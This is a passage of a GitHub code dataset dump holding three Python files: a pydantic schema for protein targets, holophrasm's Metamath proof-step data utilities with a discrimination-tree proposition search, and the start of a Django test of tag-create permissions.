0))\n","repo_name":"chen-qian-dan/Algorithms_And_Data_Structures_20211227Mon","sub_path":"14-Divide_and_Conquer/399_LongestCommonSequenceProblem.py","file_name":"399_LongestCommonSequenceProblem.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10164389587","text":"from pathlib import Path\nfrom typing import Any, Dict, Optional, Tuple, Union # noqa: F401\n\nfrom asapdiscovery.data.openeye import (\n bytes64_to_oedu,\n load_openeye_design_unit,\n load_openeye_pdb,\n oechem,\n oedu_to_bytes64,\n oemol_to_pdb_string,\n pdb_string_to_oemol,\n save_openeye_design_unit,\n)\nfrom asapdiscovery.data.schema_v2.identifiers import TargetIdentifiers\nfrom asapdiscovery.modeling.modeling import split_openeye_mol\nfrom asapdiscovery.modeling.schema import MoleculeFilter\nfrom pydantic import Field, root_validator\n\nfrom .schema_base import (\n DataModelAbstractBase,\n DataStorageType,\n check_strings_for_equality_with_exclusion,\n schema_dict_get_val_overload,\n write_file_directly,\n)\n\n\nclass InvalidTargetError(ValueError):\n ...\n\n\nclass Target(DataModelAbstractBase):\n \"\"\"\n Schema for a Target, wrapper around a PDB file\n \"\"\"\n\n target_name: str = Field(None, description=\"The name of the target\")\n\n ids: Optional[TargetIdentifiers] = Field(\n None,\n description=\"TargetIdentifiers Schema for identifiers associated with this target\",\n )\n\n data: str = Field(\n \"\",\n description=\"PDB file stored as a string to hold internal data state\",\n repr=False,\n )\n data_format: DataStorageType = Field(\n DataStorageType.pdb,\n description=\"Enum describing the data storage method\",\n allow_mutation=False,\n )\n\n @root_validator(pre=True)\n @classmethod\n def _validate_at_least_one_id(cls, v):\n # check if skip validation\n if v.get(\"_skip_validate_ids\"):\n return v\n else:\n ids = v.get(\"ids\")\n compound_name = v.get(\"target_name\")\n # check if all the identifiers are None, sometimes when this is called from\n # already instantiated ligand we need to be able to handle a dict and instantiated class\n if compound_name is None:\n if ids is None or all(\n [not v for v in schema_dict_get_val_overload(ids)]\n ):\n raise ValueError(\n \"At least one identifier must be provide, or target_name must be provided\"\n )\n return v\n\n @classmethod\n def from_pdb(\n cls, pdb_file: Union[str, Path], target_chains=[], ligand_chain=\"\", **kwargs\n ) -> \"Target\":\n kwargs.pop(\"data\", None)\n # directly read in data\n # First load full complex molecule\n complex_mol = load_openeye_pdb(pdb_file)\n\n # Split molecule into parts using given chains\n mol_filter = MoleculeFilter(\n protein_chains=target_chains, ligand_chain=ligand_chain\n )\n split_dict = split_openeye_mol(complex_mol, mol_filter)\n\n return cls.from_oemol(split_dict[\"prot\"], **kwargs)\n\n def to_pdb(self, filename: Union[str, Path]) -> None:\n # directly write out data\n write_file_directly(filename, self.data)\n\n @classmethod\n def from_oemol(cls, mol: oechem.OEMol, **kwargs) -> \"Target\":\n kwargs.pop(\"data\", None)\n pdb_str = oemol_to_pdb_string(mol)\n return cls(data=pdb_str, **kwargs)\n\n def to_oemol(self) -> oechem.OEMol:\n return pdb_string_to_oemol(self.data)\n\n def __eq__(self, other: Any) -> bool:\n if not isinstance(other, Target):\n return NotImplemented\n # check if the data is the same\n # but exclude the MASTER record as this is not always in the SAME PLACE\n # for some strange reason\n return 
check_strings_for_equality_with_exclusion(\n self.data, other.data, \"MASTER\"\n )\n\n def __ne__(self, other: Any) -> bool:\n return not self.__eq__(other)\n\n\nclass PreppedTarget(DataModelAbstractBase):\n \"\"\"\n Schema for a PreppedTarget, wrapper around an OpenEye Design Unit\n \"\"\"\n\n target_name: str = Field(None, description=\"The name of the target\")\n\n ids: Optional[TargetIdentifiers] = Field(\n None,\n description=\"TargetIdentifiers Schema for identifiers associated with this target\",\n )\n\n data: bytes = Field(\n \"\",\n description=\"OpenEye oedu file stored as a bytes object **encoded in base64** to hold internal data state\",\n repr=False,\n )\n data_format: DataStorageType = Field(\n DataStorageType.b64oedu,\n description=\"Enum describing the data storage method\",\n allow_mutation=False,\n )\n\n @root_validator(pre=True)\n @classmethod\n def _validate_at_least_one_id(cls, v):\n # simpler as we never need to pop attrs off the serialised representation.\n ids = v.get(\"ids\")\n compound_name = v.get(\"target_name\")\n # check if all the identifiers are None\n if compound_name is None:\n if ids is None or all([not v for v in schema_dict_get_val_overload(ids)]):\n raise ValueError(\n \"At least one identifier must be provide, or target_name must be provided\"\n )\n return v\n\n @classmethod\n def from_oedu(cls, oedu: oechem.OEDesignUnit, **kwargs) -> \"PreppedTarget\":\n kwargs.pop(\"data\", None)\n oedu_bytes = oedu_to_bytes64(oedu)\n return cls(data=oedu_bytes, **kwargs)\n\n def to_oedu(self) -> oechem.OEDesignUnit:\n return bytes64_to_oedu(self.data)\n\n @classmethod\n def from_oedu_file(cls, oedu_file: Union[str, Path], **kwargs) -> \"PreppedTarget\":\n kwargs.pop(\"data\", None)\n oedu = load_openeye_design_unit(oedu_file)\n return cls.from_oedu(oedu=oedu, **kwargs)\n\n def to_oedu_file(self, filename: Union[str, Path]) -> None:\n oedu = self.to_oedu()\n save_openeye_design_unit(oedu, filename)\n","repo_name":"choderalab/asapdiscovery","sub_path":"asapdiscovery-data/asapdiscovery/data/schema_v2/target.py","file_name":"target.py","file_ext":"py","file_size_in_byte":5731,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"13968531102","text":"from tree_parser import *\n#from model import *\nimport numpy as np\n\nimport random\n\n\"\"\"\nThe data utilities take a statement in a proof, assigns each\nnode a number from 0 to number_of_nodes_placeholder-1 with 0\nbeing the root node:\n\n number_of_nodes_placeholder: shape=()\n the number of nodes in the tree\n children_placeholder: shape=(None,max_axiom_arity)\n a list of the number associated to the children of the node\n prop_number_placeholder: shape=(None)\n the number associated to the proposition at that node with that arity\n arity_placeholder: shape=(None)\n the arity of the corresponding node\n\"\"\"\nlanguage_model_extra_variables_of_each_type = 0 # Chosen arbitrarily\n\n# a minimal class, which we can use to build objects.\nclass Container:\n def __init__(self):\n pass\n\nclass LanguageModel:\n def __init__(self, database):\n \"\"\"Builds a number of dictionaries equal to max_axiom_arity\"\"\"\n self.max_axiom_arity = max([p.arity() for p in database.non_entails_axioms.values()]) + 1 # one more than the max\n\n self.database = database\n\n self.max_unconstrained_arity = 10000000\n self.searcher = SearchProblem(database, max_unconstrained_arity = self.max_unconstrained_arity)\n\n self.tautologies = set()\n for p in 
self.database.propositions.values():\n e_hyps = [h for h in p.hyps if h.type == 'e']\n if p.vclass=='|-' and len(e_hyps) == 0:\n self.tautologies.add(p.label)\n print('tautologies:', len(self.tautologies))\n\n # the propositions with trivial unconstrained arity. That is, the ones\n # that are really easy to apply.\n self.constrained_propositions = set(\n p.label for p in self.database.propositions.values()\n if p.vclass == '|-' and p.unconstrained_arity() == 0\n )\n\n # figure out the names of the read variables\n # self.real_wff_names = set()\n # self.real_set_names = set()\n # self.real_class_names = set()\n # real_name_dict = {'wff': self.real_wff_names, 'set': self.real_set_names, 'class': self.real_class_names}\n #\n # for p in self.database.propositions.itervalues():\n # for label in p.f:\n # vclass = p.f[label].vclass\n # real_name_dict[vclass].add(label)\n # print real_name_dict\n\n self.constructor_dictionary = [{} for _ in range(self.max_axiom_arity)]\n\n # we need to define some extra variables, which we'll randomly assign when we read in a statement\n # this is a reasonable amount of data augmentation.\n self.extra_wffs = language_model_extra_variables_of_each_type+max(len([f for f in p.f.values() if f.vclass=='wff']) for p in database.propositions.values() )\n self.extra_classes = language_model_extra_variables_of_each_type+max(len([f for f in p.f.values() if f.vclass=='class']) for p in database.propositions.values() )\n self.extra_sets = language_model_extra_variables_of_each_type+max(len([f for f in p.f.values() if f.vclass=='set']) for p in database.propositions.values() )\n\n # hand code these in.\n self.extra_sets = 20\n self.extra_wffs = 18\n self.extra_classes = 27\n\n self.wff_names = ['WFFVar'+str(i) for i in range(self.extra_wffs)]\n self.set_names = ['SetVar'+str(i) for i in range(self.extra_sets)]\n self.class_names = ['ClassVar'+str(i) for i in range(self.extra_classes)]\n\n self.num_extra_variable_names = len(self.wff_names)+len(self.set_names)+len(self.class_names)\n self.extra_variable_dict = {}\n\n # the names for the unconstrained variables\n #self.ua_names = ['UA'+str(i) for i in range(self.max_unconstrained_arity)]\n\n # add them to the dictionary\n arityzerodict = self.constructor_dictionary[0]\n for i in range(self.extra_wffs):\n arityzerodict['WFFVar'+str(i)]=len(arityzerodict)\n self.extra_variable_dict['WFFVar'+str(i)]=len(self.extra_variable_dict)\n for i in range(self.extra_classes):\n arityzerodict['ClassVar'+str(i)]=len(arityzerodict)\n self.extra_variable_dict['ClassVar'+str(i)]=len(self.extra_variable_dict)\n for i in range(self.extra_sets):\n arityzerodict['SetVar'+str(i)]=len(arityzerodict)\n self.extra_variable_dict['SetVar'+str(i)]=len(self.extra_variable_dict)\n # for i in range(len(self.ua_names)):\n # arityzerodict['UA'+str(i)]=len(arityzerodict)\n # self.extra_variable_dict['UA'+str(i)]=len(self.extra_variable_dict)\n\n # a block to create a dictionary that takes a symbol to its vclass\n self.symbol_to_vclass = {label:database.propositions[label].vclass for label in database.non_entails_axioms}\n for symbol in self.wff_names:\n self.symbol_to_vclass[symbol] = 'wff'\n for symbol in self.set_names:\n self.symbol_to_vclass[symbol] = 'set'\n for symbol in self.class_names:\n self.symbol_to_vclass[symbol] = 'class'\n\n # a list of all of the extra variables, for use later\n self.new_names = self.wff_names+self.set_names+self.class_names\n\n # describe the number of variables we've used\n print('wff variables:',self.extra_wffs)\n print('class 
variables:',self.extra_classes)\n print('set variables:',self.extra_sets)\n #print 'ua variables:', self.ua_names\n\n # now add the actual constructor axioms to our dictionary\n for p in database.non_entails_axioms.values():\n c_dict = self.constructor_dictionary[p.arity()]\n c_dict[p.label] = len(c_dict)\n\n for i in range(self.max_axiom_arity):\n print(len(self.constructor_dictionary[i]),'constructor axioms with arity',i)\n\n # build a pair of dictionaries that convert (arity,num) to total_num\n # and vice versa. This is ugly. Whatever\n self.arity_num_to_global_index = {}\n self.global_index_to_arity_num=[]\n global_index = 0\n for arity in range(self.max_axiom_arity):\n for num in range(len(self.constructor_dictionary[arity])):\n self.global_index_to_arity_num.append((arity,num))\n self.arity_num_to_global_index[(arity,num)]=global_index\n global_index+=1\n\n \"\"\"sets up the data sets. We divide the propositions into training/validation/test and\n then compile the corresponding list of statements\"\"\"\n list_of_propositions = self.database.propositions_list[:] # database.propositions.values()\n np.random.seed(seed=121451345)\n list_of_propositions = np.random.permutation(list_of_propositions)\n\n num_validation = len(list_of_propositions)//10\n num_test = num_validation\n num_training = len(list_of_propositions)-num_test-num_validation\n self.training_propositions = list_of_propositions[:num_training]\n self.training_propositions = [_ for _ in self.training_propositions if _.type=='p']\n self.validation_propositions = list_of_propositions[num_training:num_training+num_validation]\n self.validation_propositions = [_ for _ in self.validation_propositions if _.type=='p']\n self.test_propositions = list_of_propositions[num_training+num_validation:]\n self.test_propositions = [_ for _ in self.test_propositions if _.type=='p']\n\n if self.database.remember_proof_steps:\n self.all_proof_steps = [] # except those that refer to e or f-type hypotheses\n for p in self.database.propositions.values():\n self.all_proof_steps += [step for step in p.entails_proof_steps if not (step.prop.type=='f' or step.prop.type == 'e')]\n\n\n self.training_proof_steps = []\n for p in self.training_propositions:\n self.training_proof_steps += [step for step in p.entails_proof_steps\n if not (step.prop.type=='f' or step.prop.type == 'e')]\n\n self.validation_proof_steps = []\n for p in self.validation_propositions:\n self.validation_proof_steps += [step for step in p.entails_proof_steps\n if not (step.prop.type=='f' or step.prop.type == 'e')]\n\n self.test_proof_steps = []\n for p in self.test_propositions:\n self.test_proof_steps += [step for step in p.entails_proof_steps\n if not (step.prop.type=='f' or step.prop.type == 'e')]\n\n print()\n print('training steps:', len(self.training_proof_steps))\n print('validation steps:', len(self.validation_proof_steps))\n print('test steps:', len(self.test_proof_steps))\n\n\n # figure out how frequenly each proposition is used\n self.prop_usage = [0 for p in self.database.propositions]\n for s in self.all_proof_steps:\n self.prop_usage[s.prop.number]+=1\n\n # figure out what the most difficult proof step is\n self.max_depth = max([s.height for s in self.all_proof_steps]) + 1\n print('max proof step depth:', self.max_depth-1)\n\n\n # figure out the number of times each proposition is used.\n # self.prop_uses = [0.1] * len(self.database.propositions) # for numberical stability\n # for step in self.all_proof_steps:\n # self.prop_uses[step.prop.number] += 1\n # self.initial_b = 
np.log(1.0*np.array(self.prop_uses)/sum(self.prop_uses))\n\n\n # build up a database of propositions by unconstrained arity\n # that is, total_unconstrained_arity is the total\n # of all of the unconstrained arities of all of the propositions.\n # and unconstrained_arity_indices is a list of p.unconstrained_arity()\n # unique indices for each proposition p.\n self.total_unconstrained_arity = 0\n self.unconstrained_arity_indices = {}\n self.unconstrained_label_to_number = {}\n for p in self.database.propositions_list: # in order of proposition number\n u_arity = p.unconstrained_arity()\n self.unconstrained_arity_indices[p.label]=list(range(self.total_unconstrained_arity, self.total_unconstrained_arity + u_arity))\n self.total_unconstrained_arity += u_arity\n self.unconstrained_label_to_number[p.label]=len(self.unconstrained_label_to_number)\n #self.max_unconstrained_arity = max([p.unconstrained_arity() for p in self.database.propositions.itervalues()])\n\n self.total_constructor_arity = 0\n self.constructor_arity_indices = {}\n self.constructor_label_to_number = {}\n self.constructor_labels = []\n for p in database.non_entails_axioms.values():\n u_arity = p.arity()\n self.constructor_arity_indices[p.label]=list(range(self.total_constructor_arity, self.total_constructor_arity + u_arity))\n self.total_constructor_arity += u_arity\n self.constructor_label_to_number[p.label]=len(self.constructor_label_to_number)\n self.constructor_labels.append(p.label)\n for name in self.wff_names+self.set_names+self.class_names: #+self.ua_names:\n self.constructor_arity_indices[name] = [] # the extra arity 0 constructors\n self.constructor_label_to_number[name]=len(self.constructor_label_to_number)\n self.constructor_labels.append(name)\n\n # a lookup table for the index into all the propositions of the label\n self.label_to_number = {x.label:x.number for x in self.database.propositions.values()}\n for x in self.new_names:\n self.label_to_number[x] = -1 # all variables should always be included\n\n def training_set(self): # DEFUNCT\n assert self.database.remember_proof_steps\n return np.random.permutation(self.training_proof_steps)\n\n def random_proof_step(self, source=None):\n assert self.database.remember_proof_steps\n if source is None:\n return random.choice(self.all_proof_steps)\n if source == \"test\":\n return random.choice(self.test_proof_steps)\n if source == \"train\":\n return random.choice(self.training_proof_steps)\n if source == \"validation\":\n return random.choice(self.validation_proof_steps)\n\n\n def axiom_counts(self):\n max_axiom_arity = max([p.arity() for p in self.database.non_entails_axioms.values()])+1\n # out = [0 for x in range(max_axiom_arity)]\n # for p in self.database.non_entails_axioms.itervalues():\n # out[p.arity()]+=1\n out = [len(d) for d in self.constructor_dictionary]\n return max_axiom_arity, out\n\n # this lists all the free variables in context and generates a dictionary replacing them with my own variable types.\n def random_replacement_dict_f(self, f = None):\n if f is None: return self.random_permutation_dict()\n\n statement_wffs = [l for l in f if f[l].vclass=='wff']\n statement_classes = [l for l in f if f[l].vclass=='class']\n statement_sets = [l for l in f if f[l].vclass=='set']\n wff_random = np.random.choice(self.extra_wffs, len(statement_wffs), replace=False) if self.extra_wffs>0 else {}\n class_random = np.random.choice(self.extra_classes, len(statement_classes), replace=False) if self.extra_classes>0 else {}\n set_random = np.random.choice(self.extra_sets, 
len(statement_sets), replace=False) if self.extra_sets>0 else {}\n\n replacement_dict = {}\n for i in range(len(wff_random)):\n replacement_dict[statement_wffs[i]] = self.wff_names[wff_random[i]]\n for i in range(len(class_random)):\n replacement_dict[statement_classes[i]] = self.class_names[class_random[i]]\n for i in range(len(set_random)):\n replacement_dict[statement_sets[i]] = self.set_names[set_random[i]]\n\n return replacement_dict\n\n def deterministic_replacement_dict_f(self, f = None):\n assert f is not None\n\n statement_wffs = [l for l in f if f[l].vclass=='wff']\n statement_classes = [l for l in f if f[l].vclass=='class']\n statement_sets = [l for l in f if f[l].vclass=='set']\n # wff_random = np.random.choice(self.extra_wffs, len(statement_wffs), replace=False) if self.extra_wffs>0 else {}\n # class_random = np.random.choice(self.extra_classes, len(statement_classes), replace=False) if self.extra_classes>0 else {}\n # set_random = np.random.choice(self.extra_sets, len(statement_sets), replace=False) if self.extra_sets>0 else {}\n\n replacement_dict = {}\n for i in range(len(statement_wffs)):\n replacement_dict[statement_wffs[i]] = self.wff_names[i]\n for i in range(len(statement_classes)):\n replacement_dict[statement_classes[i]] = self.class_names[i]\n for i in range(len(statement_sets)):\n replacement_dict[statement_sets[i]] = self.set_names[i]\n\n return replacement_dict\n\n def random_permutation_dict(self):\n replacement_dict={}\n\n out_vars = self.wff_names[:]\n np.random.shuffle(out_vars)\n for i in range(len(out_vars)):\n replacement_dict[self.wff_names[i]] = out_vars[i]\n\n out_vars = self.set_names[:]\n np.random.shuffle(out_vars)\n for i in range(len(out_vars)):\n replacement_dict[self.set_names[i]] = out_vars[i]\n\n out_vars = self.class_names[:]\n np.random.shuffle(out_vars)\n for i in range(len(out_vars)):\n replacement_dict[self.class_names[i]] = out_vars[i]\n return replacement_dict\n\n def random_replacement_dict(self, context):\n statement_wffs = [l for l in context.f if context.f[l].vclass=='wff']\n statement_classes = [l for l in context.f if context.f[l].vclass=='class']\n statement_sets = [l for l in context.f if context.f[l].vclass=='set']\n wff_random = np.random.choice(self.extra_wffs, len(statement_wffs), replace=False)\n class_random = np.random.choice(self.extra_classes, len(statement_classes), replace=False)\n set_random = np.random.choice(self.extra_sets, len(statement_sets), replace=False)\n\n replacement_dict = {}\n for i in range(len(wff_random)):\n replacement_dict[statement_wffs[i]] = self.wff_names[wff_random[i]]\n for i in range(len(class_random)):\n replacement_dict[statement_classes[i]] = self.class_names[class_random[i]]\n for i in range(len(set_random)):\n replacement_dict[statement_sets[i]] = self.set_names[set_random[i]]\n\n return replacement_dict\n\n def standardize_context(self, prop, tree=None):\n '''\n takes in a proposition and return it in a standardized form,\n in particular, keeping the hypotheses, variables, d statements,\n and tree.\n\n prop: a proposition\n tree: an optional tree that will replace the prop's tree\n\n this retuns an object with the following properties:\n number, tree, hyps, d_labels\n\n This uses a fixed replacement dictionary because it will make it\n easier to interpret on consequative runs.\n '''\n\n # use the default tree\n if tree is None: tree = prop.tree\n\n context = Container()\n context.label = prop.label\n\n context.number = prop.number\n replacement_dict = 
\n\n def standardize_context(self, prop, tree=None):\n '''\n takes in a proposition and returns it in a standardized form,\n in particular, keeping the hypotheses, variables, d statements,\n and tree.\n\n prop: a proposition\n tree: an optional tree that will replace the prop's tree\n\n this returns an object with the following properties:\n number, tree, hyps, d_labels\n\n This uses a fixed replacement dictionary because it will make it\n easier to interpret on consecutive runs.\n '''\n\n # use the default tree\n if tree is None: tree = prop.tree\n\n context = Container()\n context.label = prop.label\n\n context.number = prop.number\n replacement_dict = self.deterministic_replacement_dict_f(f=prop.f)\n mandatory = [h.label for h in prop.hyps if h.type == 'f']\n\n # might as well keep the tree\n context.tree = tree.copy().replace_values(replacement_dict)\n\n # I think that this is everything we need\n context.hyps = []\n for h in prop.hyps:\n newh = Container()\n newh.type = h.type\n if h.type == 'e':\n newh.tree = h.tree.copy().replace_values(replacement_dict)\n newh.label = h.label\n else:\n newh.label = replacement_dict[h.label]\n newh.old_label = h.label\n context.hyps.append(newh)\n\n # we don't need d itself, we'll just consider d_labels\n replaced_mandatory = [replacement_dict[label] for label in mandatory]\n context.mandatory = mandatory\n context.d_labels = set()\n for (i,j) in prop.d_labels:\n if i in mandatory and j in mandatory:\n context.d_labels.add((replacement_dict[i], replacement_dict[j]))\n for i in self.new_names:\n for j in self.new_names:\n if i == j:\n continue\n if i not in replaced_mandatory or j not in replaced_mandatory:\n context.d_labels.add((i,j))\n\n # the list (err... dictionary) of variables\n context.f = {k:Container() for k in self.new_names}\n for k in self.new_names:\n context.f[k].statement = [k]\n\n # list all the variables that appear in the hypotheses\n context.hyp_symbols = set()\n for h in context.hyps:\n if h.type=='e':\n context.hyp_symbols |= set(h.tree.list())\n context.hyp_symbols &= set(self.new_names)\n context.main_but_not_hyp_symbols = set(replaced_mandatory).difference(context.hyp_symbols)\n\n # the hyp symbols are the ones we're allowed to use.\n # the main_but_not_hyp_symbols symbols are explicitly excluded\n\n # I'm not sure that we should actually include this, but meh\n context.replacement_dict = replacement_dict\n return context\n\n def simple_apply_prop(self, tree, prop, context, vclass=None):\n # assert prop.unconstrained_arity() == 0\n fit = prop_applies_to_statement(tree, prop, context, vclass=vclass)\n assert fit is not None\n return [h.tree.copy().replace(fit) for h in prop.hyps if h.type=='e']\n\n '''\n Iterated fit for the tree and hyps.\n This doesn't check for disjointness, just matches the trees\n '''\n def reconstruct_fit(self, tree, hyps, prop_label):\n prop = self.database.propositions[prop_label]\n prop_variables = [f for f in prop.f]\n\n current = tree.fit(prop.tree, prop_variables)\n\n for h, ph in zip(hyps, [h.tree for h in prop.hyps if h.type=='e']):\n next_fit = h.fit(ph, prop_variables)\n if dictionary_merge(current, next_fit) is None: return None\n\n return current\n\n def prop_applies_to_statement(self, tree, prop, context, vclass=None):\n return prop_applies_to_statement(tree, prop, context, vclass=vclass)\n\n\ndef dictionary_merge(current, new):\n # merges new into current\n for x in new:\n if x in current:\n if current[x] != new[x]:\n return None\n else:\n current[x] = new[x]\n return current\n\n"""\nNow we generate some utilities that we'll use for fitting propositions and\naxioms to statements, or just which ones apply in general.\n"""\n\n# attempts to fit a proposition to a statement.
If it does fit, it returns the fit.\ndef prop_applies_to_statement(tree, prop, context, vclass=None):\n # verify first that the vclass is okay.\n if vclass is not None and prop.vclass != vclass: return None\n\n #context_variables = set(f.label for f in context.f.itervalues())\n #prop_variables = set(f.label for f in prop.f.itervalues())\n prop_variables = [f for f in prop.f]\n\n #print prop_variables\n # attempt to fit to the tree\n fit = tree.fit(prop.tree,prop_variables)\n\n if fit is None: return None # it doesn't work. Sadness.\n\n # we only need the mandatory variables\n context_variables = [x.label for x in context.hyps if x.type=='f']\n prop_variables = [x.label for x in prop.hyps if x.type=='f']\n vars_that_appear = {v:fit[v].set().intersection(context_variables) for v in fit}\n\n # print 'context_variables', context_variables\n # print 'prop_variables', prop_variables\n # print 'vars_that_appear', vars_that_appear\n\n for (xvar,yvar) in prop.d_labels:\n if xvar not in fit or yvar not in fit: continue\n for i in vars_that_appear[xvar]:\n for j in vars_that_appear[yvar]:\n if (i,j) not in context.d_labels:\n return None\n\n\n return fit\n\n\n\n\n# How the fuck do we do this search?\n# I'm just going to insert an ugly hack here, so that I have something at least.\n# Given that the brute force approach isn't terrible, this should be good, right?\n\n\"\"\"\nThis is going to be my algorithm: It's a lame algorithm but it should be good enough\nWe store some number of objects, which are a list of pairs of the following form:\n(location in tree, dictionary)\ndictionary takes a proposition or \"*\" and returns one of two things:\n1. A list of valid labels of matching propositions (if the number is small or if we're out of nodes)\n2. Another pair of the above form.\n\nTo search for valid labels, we start at the first location, and look up two values in the\ndictionary: \"*\" and whatever the label at that position is. If it's another location pair,\nfollow it and then union everything.\n\nTo build up the tree, we start with a node and add things to it. If the number of items in\nthe list is sufficiently large (greater than 100 or so), we expand that node. 
To do so,\nwe take the next location that must exist in the corresponding tree in a breadth-first manner\nand build a new dictionary node thingy based off of that.\n\nThis actually works very well with the expand_threshold of somewhere between 10 and 100.\nThat is, it adds only about 10 percent of the subsequent verification time as inefficiency.\n"""\n\n"""\n# the following code was used to test it in an ipython notebook\nsearchproblem = SearchProblem(database)\n\n\np = random.choice(database.propositions.values())\nwhile len(p.entails_proof_steps)==0: p = random.choice(database.propositions.values())\nstatement = random.choice(p.entails_proof_steps)\nprint statement.tree.stringify()\nprint statement.prop.label, statement.prop.tree.stringify()\nprint prop_applies_to_statement(statement.tree, statement.prop, p)\nprint\ndef test_all_props(statement,proplist):\n labels = set()\n for prop in proplist:\n if not prop_applies_to_statement(statement.tree, prop, p)==None:\n labels.add(prop.label)\n #print prop.label, prop.tree.stringify(), prop_applies_to_statement(statement.tree, prop, p)\n return labels\n\nlabels = test_all_props(statement,database.propositions.itervalues())\n%timeit searchproblem.search(statement.tree,p)\n%timeit test_all_props(statement,database.propositions.itervalues())\n%timeit test_all_props(statement,[database.propositions[l] for l in labels])\n#print labels\nprint getsizeof(labels)\nlabels2 = searchproblem.search(statement.tree,p)\n#print labels2\nprint list(labels).sort()==labels2.sort()\nprint statement.prop.label in labels\n"""\n\nclass SearchProblem:\n def __init__(self,database, max_unconstrained_arity = None):\n self.start = ((),{}) # root node, empty dictionary\n self.wildcard = "VAR" #the placeholder for the wildcard value\n self.expand_threshold = 10\n self.database = database\n\n for p in database.propositions.values():\n # if the unconstrained_arity is too high, skip it\n # if not max_unconstrained_arity is None and p.unconstrained_arity()>max_unconstrained_arity: continue\n self.add(p)\n\n def add(self,p):\n current = self.start\n observed_positions = []\n\n while True:\n position, dictionary = current\n observed_positions.append(position)\n value = p.tree.value_at_position(position)\n if value in p.f: value = self.wildcard #variables count as wildcards\n\n # if the value isn't in the dictionary, add it\n if value not in dictionary:\n dictionary[value] = [p.label]\n return\n\n next_pair = dictionary[value]\n if type(next_pair) is list:\n next_pair.append(p.label)\n if len(next_pair) > self.expand_threshold:\n self.expand(current,observed_positions, value,p)\n return\n\n # otherwise continue to track along the search nodes until you find it.\n current = next_pair\n\n # I use the fact that the degree of any wildcard node is 0\n def expand(self,current, observed_positions, value,p):\n # expand the node at current[1][value]\n all_positions = p.tree.breadth_first_position_list()\n\n next_position = None\n for pos in all_positions:\n if pos not in observed_positions:\n next_position = pos\n break\n if next_position is None: #we've exhausted the entire tree\n return\n\n labels = current[1][value]\n\n current[1][value] = (next_position,{})\n\n for l in labels:\n self.add(self.database.propositions[l])
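To make the (position, dictionary) node layout concrete, here is a minimal, self-contained sketch of the same discrimination-tree lookup. The integer positions and the toy patterns are hypothetical stand-ins for holophrasm's actual `Tree` objects and tuple positions:

```python
# Minimal discrimination-tree lookup (hypothetical flat-tuple encoding, not
# holophrasm's Tree class). A node is (position, children); leaves are lists.
WILDCARD = "VAR"

def tree_match(node, tokens):
    # Union of the concrete branch and the wildcard branch at each node.
    if isinstance(node, list):
        return list(node)
    position, children = node
    out = []
    if tokens[position] in children:
        out += tree_match(children[tokens[position]], tokens)
    if WILDCARD in children:
        out += tree_match(children[WILDCARD], tokens)
    return out

# Two expanded levels: position 0, then position 1 under the 'wi' branch.
root = (0, {'wi': (1, {'wph': ['ax-1'], WILDCARD: ['ax-2', 'ax-3']})})
print(tree_match(root, ('wi', 'wph')))  # ['ax-1', 'ax-2', 'ax-3']
print(tree_match(root, ('wi', 'wps')))  # ['ax-2', 'ax-3']
```

As in the real `search` below, this stage only over-approximates: every candidate it returns still has to pass `prop_applies_to_statement` afterwards, but no proposition that could fit is ever dropped.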
\n\n # Performs the search in the tree. I'll use this as a utility function\n # for dealing with the actual matching: it's a pretty good filter, I hope\n def tree_match(self, tree, current = None):\n if current is None: current = self.start\n\n # if we ended up at a list, return everything\n if type(current) is list: return current\n\n position, dictionary = current\n value = tree.value_at_position(position)\n out = []\n if value in dictionary: out+= self.tree_match(tree,current=dictionary[value] )\n if self.wildcard in dictionary: out+= self.tree_match(tree,current=dictionary[self.wildcard])\n return out\n\n # given a statement, this will return all of the consistent propositions.\n # if max_proposition (=context.number) is set, the search\n # will only return propositions numbered *less* than that.\n def search(self,tree,context, max_proposition = None, vclass=None):\n restricted_labels = self.tree_match(tree)\n out = [l for l in restricted_labels if not prop_applies_to_statement(tree, self.database.propositions[l], context, vclass=vclass) is None]\n if max_proposition is not None:\n out = [l for l in out if self.database.propositions[l].number<max_proposition]\n return out\n\n def search_dictionary(self,tree,context, max_proposition = None, vclass=None):\n restricted_labels = self.tree_match(tree)\n out = {}\n for l in restricted_labels:\n if max_proposition is not None and self.database.propositions[l].number>=max_proposition:\n continue\n fit = prop_applies_to_statement(tree, self.database.propositions[l], context, vclass=vclass)\n if fit is not None:\n out[l]=fit\n return out\n","repo_name":"dwhalen/holophrasm","sub_path":"data_utils5.py","file_name":"data_utils5.py","file_ext":"py","file_size_in_byte":28707,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"53"} +{"seq_id":"29558969548","text":"from django.test import tag\nfrom functional_tests.base import FunctionalTest\nfrom projects.models import Project\nfrom guardian.shortcuts import assign_perm\n\n\n@tag('slow')\nclass TagCreateTestCase(FunctionalTest):\n def get_tag_create(self, proj):\n self.browser.get(self.live_server_url +\n f\"/projects/{proj.name}/tags/create/\")\n\n def test_user_enter_wrong_slug_in_url(self):\n self.not_matching_url_slug_helper(self.TAG_CREATE_URL)\n\n def test_annonymous_user_visits_tags_list(self):\n # CREATE SAMPLE PROJECT.\n proj = Project.objects.create(name=\"project_1\")\n # Anonymous user cannot visit the tag create page.\n self.get_tag_create(proj)\n # He cannot access the requested url.\n # He is still on the home page of biodb.\n current_url = self.browser.current_url\n expected_url = self.live_server_url + f\"/accounts/login/?next=/projects/{proj.name}/tags/create/\"\n self.assertEqual(current_url, expected_url)\n\n def test_user_without_project_visit_permission_tries_to_get_tag_cerate_page(self):\n # CREATE SAMPLE PROJECT AND USER\n usr, proj = self.project_set_up_using_default_data()\n # User tries to get the tag create page. He doesn't have project visit permission.\n self.get_tag_create(proj)\n # He sees a permission denied error.\n error = self.browser.find_element_by_css_selector(\"h1\")\n self.assertEqual(\n error.text, \"User doesn't have permission: can visit project\")
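The permission-denied assertion above exercises an object-level gate. A minimal sketch of how such a gate is commonly written with django-guardian (hypothetical view code under assumed names, not this repo's actual implementation):

```python
# Hypothetical view-side gate (assumed names, not biodb's actual view code):
# django-guardian's backend lets has_perm take the object being protected.
from django.core.exceptions import PermissionDenied
from django.shortcuts import get_object_or_404

from projects.models import Project

def tag_create_view(request, project_name):
    project = get_object_or_404(Project, name=project_name)
    # Object-level check; failing it produces the 403 page the test asserts on.
    if not request.user.has_perm("projects.can_visit_project", project):
        raise PermissionDenied("User doesn't have permission: can visit project")
    ...  # render the "Create Tag:" form here
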